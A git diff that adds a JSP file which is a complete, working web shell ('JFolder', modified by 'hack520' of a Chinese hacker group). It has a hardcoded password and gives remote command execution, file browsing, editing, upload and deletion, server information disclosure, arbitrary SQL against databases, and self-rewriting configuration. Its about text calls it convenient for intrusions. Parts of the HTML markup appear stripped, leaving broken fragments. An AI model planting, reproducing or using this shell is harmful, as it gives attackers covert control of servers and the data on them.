diff --git a/jsp/520.jsp b/jsp/520.jsp new file mode 100644 index 0000000..2d3e895 --- /dev/null +++ b/jsp/520.jsp @@ -0,0 +1,1811 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "8013520"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} + +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + +public String Unicode2GB(String str) { + String sRet = null; + + try { + sRet = new String(str.getBytes("ISO8859_1"), _encodeType); + } catch (Exception e) { + sRet = str; + } + + return sRet; +} + +public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "bad command \"" + cmd + "\""; + } finally { + return retStr; + } +} + +public String pathConvert(String path) { + String sRet = path.replace('\\', '/'); + File file = new File(path); + + if (file.getParent() != null) { + if (file.isDirectory()) { + if (! sRet.endsWith("/")) + sRet += "/"; + } + } else { + if (! sRet.endsWith("/")) + sRet += "/"; + } + + return sRet; +} + +public String strCut(String str, int len) { + String sRet; + + len -= 3; + + if (str.getBytes().length <= len) { + sRet = str; + } else { + try { + sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; + } catch (Exception e) { + sRet = str; + } + } + + return sRet; +} + +public String listFiles(String path, String curUri) { + File[] files = null; + File curFile = null; + String sRet = null; + int n = 0; + boolean isRoot = path.equals(""); + + path = pathConvert(path); + + try { + if (isRoot) { + files = File.listRoots(); + } else { + try { + curFile = new File(path); + String[] sFiles = curFile.list(); + files = new File[sFiles.length]; + + for (n = 0; n < sFiles.length; n ++) { + files[n] = new File(path + sFiles[n]); + } + } catch (Exception e) { + sRet = "bad path \"" + path + "\""; + } + } + + if (sRet == null) { + sRet = "\n"; + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + + if (curFile != null) { + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + } + + sRet += "\n"; + + sRet += " \n"; + + for (n = 0; n < files.length; n ++) { + sRet += " \n"; + + if (! isRoot) { + sRet += " \n"; + if (files[n].isDirectory()) { + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + } + sRet += " \n"; + sRet += "
\n"; + sRet += "  上级目录 "; + sRet += "创建目录 "; + sRet += "新建文件 "; + sRet += "删除 "; + sRet += "复制 "; + sRet += "重命名 "; + sRet += "上传文件\n"; + sRet += " \n"; + sRet += "
<" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
\n"; + } + } catch (SecurityException e) { + sRet = "security violation, no privilege."; + } + + return sRet; +} + +public boolean isTextFile(String extName) { + int i; + boolean bRet = false; + + if (! extName.equals("")) { + for (i = 0; i < _textFileTypes.length; i ++) { + if (extName.equals(_textFileTypes[i])) { + bRet = true; + break; + } + } + } else { + bRet = true; + } + + return bRet; +} + +public String getExtName(String fileName) { + String sRet = ""; + int nLastDotPos; + + fileName = pathConvert(fileName); + + nLastDotPos = fileName.lastIndexOf("."); + + if (nLastDotPos == -1) { + sRet = ""; + } else { + sRet = fileName.substring(nLastDotPos + 1); + } + + return sRet; +} + +public String browseFile(String path) { + String sRet = ""; + File file = null; + FileReader fileReader = null; + + path = pathConvert(path); + + try { + file = new File(path); + fileReader = new FileReader(file); + String fileString = ""; + char[] chBuffer = new char[1024]; + int ret; + + sRet = "\n"; + + } catch (IOException e) { + sRet += "\n"; + } + + return sRet; +} + +public String openFile(String path, String curUri) { + String sRet = ""; + boolean canOpen = false; + int nLastDotPos = path.lastIndexOf("."); + String extName = ""; + String fileString = null; + File curFile = null; + + path = pathConvert(path); + + if (nLastDotPos == -1) { + canOpen = true; + } else { + extName = path.substring(nLastDotPos + 1); + canOpen = isTextFile(extName); + } + + if (canOpen) { + try { + fileString = ""; + curFile = new File(path); + FileReader fileReader = new FileReader(curFile); + char[] chBuffer = new char[1024]; + int nRet; + + while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { + fileString += new String(chBuffer, 0, nRet); + } + + fileReader.close(); + } catch (IOException e) { + fileString = null; + sRet = "不能打开文件\"" + path + "\""; + } catch (SecurityException e) { + fileString = null; + sRet = "安全问题,没有权限执行该操作"; + } + } else { + sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; + } + + if (fileString != null) { + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += "
[上级目录]
\n"; + sRet += " \n"; + sRet += "
 
\n"; + } + + return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path); + + if (! file.canWrite()) { + sRet = "文件不可写"; + } else { + FileWriter fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + + fileWriter.close(); + sRet = "文件保存成功,正在返回,请稍候……\n"; + sRet += "\n"; + } + } catch (IOException e) { + sRet = "保存文件失败"; + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } + + return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { + String sRet = ""; + File folder = null; + + path = pathConvert(path); + + try { + folder = new File(path + folderName); + + if (folder.exists() && folder.isDirectory()) { + sRet = "\"" + path + folderName + "\"目录已经存在"; + } else { + if (folder.mkdir()) { + sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n"; + sRet += ""; + } else { + sRet = "创建目录\"" + folderName + "\"失败"; + } + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } + + return sRet; +} + +public String createFile(String path, String curUri, String fileName) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path + fileName); + + if (file.createNewFile()) { + sRet = ""; + } else { + sRet = "\"" + path + fileName + "\"文件已经存在"; + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } catch (IOException e) { + sRet = "创建文件\"" + path + fileName + "\"失败"; + } + + return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { + String sRet = ""; + File tmpFile = null; + + try { + for (int i = 0; i < files2Delete.length; i ++) { + tmpFile = new File(files2Delete[i]); + if (! tmpFile.delete()) { + sRet += "删除\"" + files2Delete[i] + "\"失败
\n"; + } + } + + if (sRet.equals("")) { + sRet = "删除成功,正在返回,请稍候……\n"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作\n"; + } + + return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + FileWriter fileWriter = null; + + try { + file = new File(path); + + if (file.createNewFile()) { + fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + fileWriter.close(); + + sRet = ""; + } else { + sRet = "文件\"" + path + "\"已经存在"; + } + } catch (IOException e) { + sRet = "创建文件\"" + path + "\"失败"; + } + + return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { + String sRet = ""; + File file = null; + InputStream in = null; + + path = pathConvert(path); + + try { + in = request.getInputStream(); + + byte[] inBytes = new byte[request.getContentLength()]; + int nBytes; + int start = 0; + int end = 0; + int size = 1024; + String token = null; + String filePath = null; + + // + // 把输入流读入一个字节数组 + // + while ((nBytes = in.read(inBytes, start, size)) != -1) { + start += nBytes; + } + + in.close(); + // + // 从字节数组中得到文件分隔符号 + // + int i = 0; + byte[] seperator; + + while (inBytes[i] != 13) { + i ++; + } + + seperator = new byte[i]; + + for (i = 0; i < seperator.length; i ++) { + seperator[i] = inBytes[i]; + } + + // + // 得到Header部分 + // + String dataHeader = null; + i += 3; + start = i; + while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { + i ++; + } + end = i - 1; + dataHeader = new String(inBytes, start, end - start + 1); + + // + // 得到文件名 + // + token = "filename=\""; + start = dataHeader.indexOf(token) + token.length(); + token = "\""; + end = dataHeader.indexOf(token, start) - 1; + filePath = dataHeader.substring(start, end + 1); + filePath = pathConvert(filePath); + String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + + // + // 得到文件内容开始位置 + // + i += 4; + start = i; + + /* + boolean found = true; + byte[] tmp = new byte[seperator.length]; + while (i <= inBytes.length - 1 - seperator.length) { + + for (int j = i; j < i + seperator.length; j ++) { + if (seperator[j - i] != inBytes[j]) { + found = false; + break; + } else + tmp[j - i] = inBytes[j]; + } + + if (found) + break; + + i ++; + }*/ + + // + // 偷懒的办法 + // + end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + + // + // 保存为文件 + // + File newFile = new File(path + fileName); + newFile.createNewFile(); + FileOutputStream out = new FileOutputStream(newFile); + + //out.write(inBytes, start, end - start + 1); + out.write(inBytes, start, end - start + 1); + out.close(); + + sRet = "\n"; + } catch (IOException e) { + sRet = "\n"; + } + + sRet += ""; + return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} + +public String getFileNameByPath(String path) { + String sRet = ""; + + path = pathConvert(path); + + if (path.lastIndexOf("/") != -1) { + sRet = path.substring(path.lastIndexOf("/") + 1); + } else { + sRet = path; + } + + return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { + String sRet = ""; + int i; + + path = pathConvert(path); + dstPath = pathConvert(dstPath); + + for (i = 0; i < files2Copy.length; i ++) { + if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { + sRet += "文件\"" + files2Copy[i] + "\"复制失败
"; + } + } + + if (sRet.equals("")) { + sRet = "文件复制成功,正在返回,请稍候……"; + sRet += ""; + } + + return sRet; +} + +public boolean isFileName(String fileName) { + boolean bRet = false; + + Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); + Matcher m = p.matcher(fileName); + + bRet = m.matches(); + + return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { + String sRet = ""; + + path = pathConvert(path); + file2Rename = pathConvert(file2Rename); + + try { + File file = new File(file2Rename); + + newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; + File newFile = new File(newName); + + if (! file.exists()) { + sRet = "文件\"" + file2Rename + "\"不存在"; + } else { + file.renameTo(newFile); + sRet = "文件重命名成功,正在返回,请稍候……"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "安全问题导致文件\"" + file2Rename + "\"复制失败"; + } + + return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { + boolean bRet = true; + String driverName = ""; + + if (dbServer.equals("")) + dbServer = "localhost"; + + try { + if (dbType.equals("sqlserver")) { + driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; + if (dbPort.equals("")) + dbPort = "1433"; + _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("mysql")) { + driverName = "com.mysql.jdbc.Driver"; + if (dbPort.equals("")) + dbPort = "3306"; + _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("odbc")) { + driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; + _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; + } else if (dbType.equals("oracle")) { + driverName = "oracle.jdbc.driver.OracleDriver"; + _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; + } else if (dbType.equals("db2")) { + driverName = "com.ibm.db2.jdbc.app.DB2Driver"; + _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; + } + + Class.forName(driverName); + } catch (ClassNotFoundException e) { + bRet = false; + } + + return bRet; +} + +public boolean DBConnect(String User, String Password) { + boolean bRet = false; + + if (_url != null) { + try { + _dbConnection = DriverManager.getConnection(_url, User, Password); + _dbStatement = _dbConnection.createStatement(); + bRet = true; + } catch (SQLException e) { + bRet = false; + } + } + + return bRet; +} + +public String DBExecute(String sql) { + String sRet = ""; + + if (_dbConnection == null || _dbStatement == null) { + sRet = "数据库没有正常连接"; + } else { + try { + if (sql.toLowerCase().substring(0, 6).equals("select")) { + ResultSet rs = _dbStatement.executeQuery(sql); + ResultSetMetaData rsmd = rs.getMetaData(); + int colNum = rsmd.getColumnCount(); + int colType; + + sRet = "sql语句执行成功,返回结果
\n"; + sRet += "\n"; + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + sRet += " \n"; + } + sRet += " \n"; + while (rs.next()) { + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + colType = rsmd.getColumnType(i); + + sRet += " \n"; + } + sRet += " \n"; + } + sRet += "
" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
"; + switch (colType) { + case Types.BIGINT: + sRet += rs.getLong(i); + break; + + case Types.BIT: + sRet += rs.getBoolean(i); + break; + + case Types.BOOLEAN: + sRet += rs.getBoolean(i); + break; + + case Types.CHAR: + sRet += rs.getString(i); + break; + + case Types.DATE: + sRet += rs.getDate(i).toString(); + break; + + case Types.DECIMAL: + sRet += rs.getDouble(i); + break; + + case Types.NUMERIC: + sRet += rs.getDouble(i); + break; + + case Types.REAL: + sRet += rs.getDouble(i); + break; + + case Types.DOUBLE: + sRet += rs.getDouble(i); + break; + + case Types.FLOAT: + sRet += rs.getFloat(i); + break; + + case Types.INTEGER: + sRet += rs.getInt(i); + break; + + case Types.TINYINT: + sRet += rs.getShort(i); + break; + + case Types.VARCHAR: + sRet += rs.getString(i); + break; + + case Types.TIME: + sRet += rs.getTime(i).toString(); + break; + + case Types.DATALINK: + sRet += rs.getTimestamp(i).toString(); + break; + } + sRet += "
\n"; + + rs.close(); + } else { + if (_dbStatement.execute(sql)) { + sRet = "sql语句执行成功"; + } else { + sRet = "sql语句执行失败"; + } + } + } catch (SQLException e) { + sRet = "sql语句执行失败"; + } + } + + return sRet; +} + +public void DBRelease() { + try { + if (_dbStatement != null) { + _dbStatement.close(); + _dbStatement = null; + } + + if (_dbConnection != null) { + _dbConnection.close(); + _dbConnection = null; + } + } catch (SQLException e) { + + } +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { + private String _jshellContent = null; + private String _path = null; + + public JshellConfig(String path) throws JshellConfigException { + _path = path; + read(); + } + + private void read() throws JshellConfigException { + try { + FileReader jshell = new FileReader(new File(_path)); + char[] buffer = new char[1024]; + int nChars; + _jshellContent = ""; + + while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { + _jshellContent += new String(buffer, 0, nChars); + } + + jshell.close(); + } catch (IOException e) { + throw new JshellConfigException("打开文件失败"); + } + } + + public void save() throws JshellConfigException { + FileWriter jshell = null; + + try { + jshell = new FileWriter(new File(_path)); + char[] buffer = _jshellContent.toCharArray(); + int start = 0; + int size = 1024; + + for (start = 0; start < buffer.length - 1 - size; start += size) { + jshell.write(buffer, start, size); + } + + jshell.write(buffer, start, buffer.length - 1 - start); + } catch (IOException e) { + new JshellConfigException("写文件失败"); + } finally { + try { + jshell.close(); + } catch (IOException e) { + + } + } + } + + public void setPassword(String password) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = p.matcher(password); + + if (! m.matches()) { + throw new JshellConfigException("密码不能有除字母数字下划线以外的字符"); + } + + p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); + m = p.matcher(_jshellContent); + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + + //return HTMLEncode(_jshellContent); + } + + public void setEncodeType(String encodeType) throws JshellConfigException { + Pattern p = Pattern.compile("[A-Za-z0-9]+"); + Matcher m = p.matcher(encodeType); + + if (! m.matches()) { + throw new JshellConfigException("编码格式只能是字母和数字的组合"); + } + + p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); + //return HTMLEncode(_jshellContent); + } + + public void setSessionTime(String sessionTime) throws JshellConfigException { + Pattern p = Pattern.compile("\\d+"); + Matcher m = p.matcher(sessionTime); + + if (! m.matches()) { + throw new JshellConfigException("session超时时间只能填数字"); + } + + p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); + //return HTMLEncode(_jshellContent); + } + + public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = null; + int i; + String fileTypes = ""; + String tmpFileTypes = ""; + + for (i = 0; i < textFileTypes.length; i ++) { + m = p.matcher(textFileTypes[i]); + + if (! m.matches()) { + throw new JshellConfigException("扩展名只能是字母数字和下划线的组合"); + } + + if (i != textFileTypes.length - 1) + fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; + else + fileTypes += "\"" + textFileTypes[i] + "\""; + } + + for (i = 0; i < _textFileTypes.length; i ++) { + if (i != _textFileTypes.length - 1) + tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; + else + tmpFileTypes += "\"" + _textFileTypes[i] + "\""; + } + + p = Pattern.compile(tmpFileTypes); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序文件已经被非法修改"); + } + + _jshellContent = m.replaceAll(fileTypes); + + //return HTMLEncode(_jshellContent); + } + + public String getContent() { + return HTMLEncode(_jshellContent); + } +} + +class JshellConfigException extends Exception { + public JshellConfigException(String message) { + super(message); + } +} +%> + + +JFolder 华夏猪头三修改版 + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> +
+ + + + +
+ + + + + + + + + + + + + + + +
 8管理登录 :::...JFolder_By_hack520
+ + +
+
+<% +//================================================================================================ +// end of the login form +} else { + String password = null; + + if (session.getAttribute("password") == null) { + password = (String)request.getParameter("password"); + + if (validate(password) == false) { + out.println("
  • 哎呀,倒霉死啦!
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } + + String action = null; + + + if (request.getParameter("action") == null) + action = "main"; + else + action = (String)request.getParameter("action"); + + if (action.equals("exit")) { + session.removeAttribute("password"); + response.sendRedirect(request.getRequestURI()); + out.close(); + return; + } + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + + if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    服务器信息
    服务器名<%=request.getServerName()%>
    服务器端口<%=request.getServerPort()%>
    操作系统<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    当前用户名<%=System.getProperty("user.name")%>
    当前用户目录<%=System.getProperty("user.home")%>
    当前用户工作目录<%=System.getProperty("user.dir")%>
    程序相对路径<%=request.getRequestURI()%>
    程序绝对路径<%=request.getRealPath(request.getServletPath())%>
    网络协议<%=request.getProtocol()%>
    服务器软件版本信息<%=application.getServerInfo()%>
    JDK版本<%=System.getProperty("java.version")%>
    JDK安装路径<%=System.getProperty("java.home")%>
    JAVA虚拟机版本<%=System.getProperty("java.vm.specification.version")%>
    JAVA虚拟机名<%=System.getProperty("java.vm.name")%>
    JAVA类路径<%=System.getProperty("java.class.path")%>
    JAVA载入库搜索路径<%=System.getProperty("java.library.path")%>
    JAVA临时目录<%=System.getProperty("java.io.tmpdir")%>
    JIT编译器名<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    扩展目录路径<%=System.getProperty("java.ext.dirs")%>
    客户端信息
    客户机地址<%=request.getRemoteAddr()%>
    服务机器名<%=request.getRemoteHost()%>
    用户名<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    请求方式<%=request.getScheme()%>
    应用安全套接字层<%=request.isSecure() == true ? "是" : "否"%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("filesystem")) { + String curPath = ""; + String result = ""; + String fsAction = ""; + + if (request.getParameter("curPath") == null) { + curPath = request.getRealPath(request.getServletPath()); + curPath = pathConvert((new File(curPath)).getParent()); + } else { + curPath = Unicode2GB((String)request.getParameter("curPath")); + } + + if (request.getParameter("fsAction") == null) { + fsAction = "list"; + } else { + fsAction = (String)request.getParameter("fsAction"); + } + + if (fsAction.equals("list")) + result = listFiles(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("browse")) { + result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); + result += browseFile(curPath); + } + else if (fsAction.equals("open")) + result = openFile(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("save")) { + if (request.getParameter("fileContent") == null) { + result = "页面导航错误"; + } else { + String fileContent = Unicode2GB((String)request.getParameter("fileContent")); + result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("createFolder")) { + if (request.getParameter("folderName") == null) { + result = "目录名不能为空"; + } else { + String folderName = Unicode2GB(request.getParameter("folderName").trim()); + if (folderName.equals("")) { + result = "目录名不能为空"; + } else { + result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); + } + } + } else if (fsAction.equals("createFile")) { + if (request.getParameter("fileName") == null) { + result = "文件名不能为空"; + } else { + String fileName = Unicode2GB(request.getParameter("fileName").trim()); + if (fileName.equals("")) { + result = "文件名不能为空"; + } else { + result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); + } + } + } else if (fsAction.equals("deleteFile")) { + if (request.getParameter("filesDelete") == null) { + result = "没有选择要删除的文件"; + } else { + String[] files2Delete = (String[])request.getParameterValues("filesDelete"); + if (files2Delete.length == 0) { + result = "没有选择要删除的文件"; + } else { + for (int n = 0; n < files2Delete.length; n ++) { + files2Delete[n] = Unicode2GB(files2Delete[n]); + } + result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); + } + } + } else if (fsAction.equals("saveAs")) { + if (request.getParameter("fileContent") == null) { + result = "页面导航错误"; + } else { + String fileContent = Unicode2GB(request.getParameter("fileContent")); + result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("upload")) { + result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); + } else if (fsAction.equals("copyto")) { + if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { + result = "没有选择要复制的文件"; + } else { + String[] files2Copy = request.getParameterValues("filesDelete"); + String dstPath = request.getParameter("dstPath").trim(); + if (files2Copy.length == 0) { + result = "没有选择要复制的文件"; + } else if (dstPath.equals("")) { + result = "没有填写要复制到的目录路径"; + } else { + for (int i = 0; i < files2Copy.length; i ++) + files2Copy[i] = Unicode2GB(files2Copy[i]); + + result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); + } + } + } else if (fsAction.equals("rename")) { + if (request.getParameter("fileRename") == null) { + result = "页面导航错误"; + } else { + String file2Rename = request.getParameter("fileRename").trim(); + String newName = request.getParameter("newName").trim(); + if (file2Rename.equals("")) { + result = "没有选择要重命名的文件"; + } else if (newName.equals("")) { + result = "没有填写新文件名"; + } else { + result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); + } + } + } +%> + + + + + + + + + +
    地址   +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("command")) { + String cmd = ""; + InputStream ins = null; + String result = ""; + + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command"); + result = exeCmd(cmd); + } +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    执行命令
    + + +
    执行结果
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("database")) { + String dbAction = ""; + String result = ""; + String dbType = ""; + String dbServer = ""; + String dbPort = ""; + String dbUsername = ""; + String dbPassword = ""; + String dbName = ""; + String dbResult = ""; + String sql = ""; + + if (request.getParameter("dbAction") == null) { + dbAction = "main"; + } else { + dbAction = request.getParameter("dbAction").trim(); + if (dbAction.equals("")) + dbAction = "main"; + } + + if (dbAction.equals("main")) { + result = " "; + } else if (dbAction.equals("dbConnect")) { + if (request.getParameter("dbType") == null || + request.getParameter("dbServer") == null || + request.getParameter("dbPort") == null || + request.getParameter("dbUsername") == null || + request.getParameter("dbPassword") == null || + request.getParameter("dbName") == null) { + response.sendRedirect(request.getRequestURI() + "?action=" + action); + } else { + dbType = request.getParameter("dbType").trim(); + dbServer = request.getParameter("dbServer").trim(); + dbPort = request.getParameter("dbPort").trim(); + dbUsername = request.getParameter("dbUsername").trim(); + dbPassword = request.getParameter("dbPassword").trim(); + dbName = request.getParameter("dbName").trim(); + + if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { + if (DBConnect(dbUsername, dbPassword)) { + if (request.getParameter("sql") != null) { + sql = request.getParameter("sql").trim(); + if (! sql.equals("")) { + dbResult = DBExecute(sql); + } + } + + result = "\n"; + result += "sql语句

     \n"; + + DBRelease(); + } else { + result = "数据库连接失败"; + } + } else { + result = "数据库连接驱动没有找到"; + } + } + } +%> + + + "> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    数据库连接类型 + + +
    数据库服务器地址
    数据库服务器端口
    数据库用户名
    数据库密码
    数据库名
     
    <%=result%>
    + + + + +
    + <%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("config")) { + String cfAction = ""; + int i; + + if (request.getParameter("cfAction") == null) { + + cfAction = "main"; + } else { + cfAction = request.getParameter("cfAction").trim(); + if (cfAction.equals("")) + cfAction = "main"; + } + + if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + + " onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    密码
    系统编码
    Session超时时间
    可编辑文件类型 + + + + + + +
    + + + +

    + +     		+ +
    +
    +<% + } else if (cfAction.equals("save")) { + if (request.getParameter("password") == null || + request.getParameter("encode") == null || + request.getParameter("sessionTime") == null || + request.getParameterValues("textFileTypes") == null) { + response.sendRedirect(request.getRequestURI()); + } + + String result = ""; + + String newPassword = request.getParameter("password").trim(); + String newEncodeType = request.getParameter("encode").trim(); + String newSessionTime = request.getParameter("sessionTime").trim(); + String[] newTextFileTypes = request.getParameterValues("textFileTypes"); + String jshellPath = request.getRealPath(request.getServletPath()); + + try { + JshellConfig jconfig = new JshellConfig(jshellPath); + jconfig.setPassword(newPassword); + jconfig.setEncodeType(newEncodeType); + jconfig.setSessionTime(newSessionTime); + jconfig.setTextFileTypes(newTextFileTypes); + jconfig.save(); + result += "设置保存成功,正在返回,请稍候……"; + result += ""; + } catch (JshellConfigException e) { + result = "" + e.getMessage() + ""; + } + +%> + + + + +
    <%=result == "" ? " " : result%>
    +<% + } +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form + } else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
    关于 jshell ver 0.1
        增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.
    hack520 by hack520 and welcome to 华夏黑客同盟
